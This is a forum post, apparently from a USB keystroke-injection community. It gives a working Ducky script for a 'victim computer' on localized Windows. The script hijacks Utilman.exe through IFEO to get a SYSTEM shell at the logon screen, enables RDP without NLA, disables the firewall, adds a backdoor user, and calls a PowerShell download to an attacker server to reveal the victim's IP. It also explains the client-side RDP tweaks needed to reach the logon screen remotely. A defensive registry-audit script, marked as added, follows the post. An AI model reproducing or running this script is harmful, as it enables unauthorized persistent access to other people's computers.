
Locale Problem Workaround In Some Typical Usage


RUdude


Hi there,

I just want to share some experience with a workaround for different locales when using exploits like utilman https://github.com/h...utilman-exploit and creating a local user with administrator rights.

The main problem is that the current firmware does not support the Russian language (and many others), so it is impossible to change file ownership or add a newly created user to the admins group, as for example in a localized Windows version the Administrators group name is also localized (_Administratory_) (unfortunately this forum does not accept RU chars and I cannot use the Russian word here), so commands like these will never work:

[CODE]STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE]

[CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE]

The post by [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and it helped me a lot to make such a workaround.

As there is very restricted time while injecting the victim computer, especially if you will not have physical access to this PC later, Terminal Services is also used here for getting full access. The idea is to add a local user with restricted rights + the utilman hack 'by PCFreak', and then remotely run cmd.exe using the "Ease of Access" button at the logon screen and promote the user to Admins.

After injection the script makes an HTTP request to the specified server using PowerShell, so you may easily find its IP address in the web server logfile. Sure, this will work only for real IP addresses, not with fake or NAT ones.

Windows 7 example, ANY localization, but the default keyboard input locale should be US-English anyway, unfortunately. So before injecting, try to check or change this. I do not know a workaround here, let's discover it together?

[CODE]
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 1000
LEFT
DELAY 200
ENTER
DELAY 200
ENTER
STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 200
STRING netsh firewall set opmode disable
ENTER
DELAY 200
STRING net user Local000 /add
ENTER
DELAY 200
STRING net user Local000 *
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt');
ENTER
DELAY 200
STRING exit
ENTER
[/CODE]

This script also enables Terminal Services in old-client compatibility (without NLA) mode and disables Windows Firewall.

For connecting to the remote logon screen from NLA-enabled MSTSC clients like the one in Windows 7, you also need some client-side modification, otherwise the username and password will be requested before connection to the server and you will never be able to see the Logon screen and will not be able to use the EoA button. To resolve this issue you need to save an empty RDP file and edit it using any editor like notepad.exe; these params should be changed/added:

[CODE]
authentication level:i:0
enablecredsspsupport:i:0
[/CODE]

After this modification, save the file and connect to the server; you will go directly to the Logon screen. Give admin rights to your new user and after this you'll be able to log in remotely (and locally, sure).

---

BTW, another locale problem is that fast keys (underlined chars in menu items) in the Start menu or right-button menu are also localized; for this reason I am not using these like

[CODE]MENU
STRING a[/CODE]

instead of this I select the menu item using cursor keys:

[CODE]
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
[/CODE]

I hope it will be helpful for someone.

PS: this script will also work within a Terminal Services session, so you will also be able to inject a remote PC using the local USB port; usually it is connected to the session on the remote side (only in fullscreen mode).

Regards from Russia :)

Edited by RUdude
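An added audit script, not from RUdude's post or the linked exploit, that reads the same registry values the Ducky script above writes, so a defender can detect (and then revert) those changes on any Windows language version. It assumes PowerShell 2.0 or later on Windows 7 or newer and only reads HKLM; the firewall check uses the registry instead of netsh output because netsh text is localized, which is the very problem the post describes.

```powershell
# Audit for the artifacts left by the Utilman/RDP Ducky script above.
# Added example, not part of the original post. Assumes PowerShell 2.0+
# on Windows 7 or later; reads HKLM only, so run it elevated for consistent results.

function Test-UtilmanRdpArtifacts {
    $findings = @()

    # 1. IFEO "Debugger" hijack on Utilman.exe. Windows ships no Debugger value
    #    here, so any value at all is a finding (the post sets it to cmd.exe).
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe'
    if (Test-Path $ifeo) {
        $dbg = (Get-ItemProperty -Path $ifeo -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { $findings += "IFEO Debugger set for Utilman.exe: '$dbg'" }
    }

    # 2. Terminal Services values the script flips (RDP on, NLA off).
    #    Missing values read as $null, which matches neither 0 nor 1, so no finding.
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tsProps = Get-ItemProperty -Path $ts -ErrorAction SilentlyContinue
    if ($tsProps.fDenyTSConnections -eq 0) { $findings += 'Remote Desktop enabled (fDenyTSConnections=0)' }
    if ($tsProps.TSUserEnabled -eq 1)     { $findings += 'TSUserEnabled=1' }
    $rdp = Get-ItemProperty -Path "$ts\WinStations\RDP-Tcp" -ErrorAction SilentlyContinue
    if ($rdp.UserAuthentication -eq 0) { $findings += 'NLA disabled on RDP-Tcp (UserAuthentication=0)' }

    # 3. Firewall state per profile, read from the registry rather than parsed
    #    from localized netsh output. EnableFirewall = 0 means the profile is off;
    #    an absent value means the default (on) applies and is not reported.
    $fwBase = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy'
    foreach ($fwProfile in 'DomainProfile', 'StandardProfile', 'PublicProfile') {
        $state = (Get-ItemProperty -Path "$fwBase\$fwProfile" -ErrorAction SilentlyContinue).EnableFirewall
        if ($state -eq 0) { $findings += "Windows Firewall disabled for $fwProfile" }
    }

    # Unary comma keeps an empty or single-item result as an array.
    return ,$findings
}

$result = Test-UtilmanRdpArtifacts
if ($result.Count -eq 0) { 'No artifacts of the script found.' } else { $result }
```

Any non-empty result is worth correlating with a recent local account creation, since the script pairs the Utilman hijack with a `net user ... /add`.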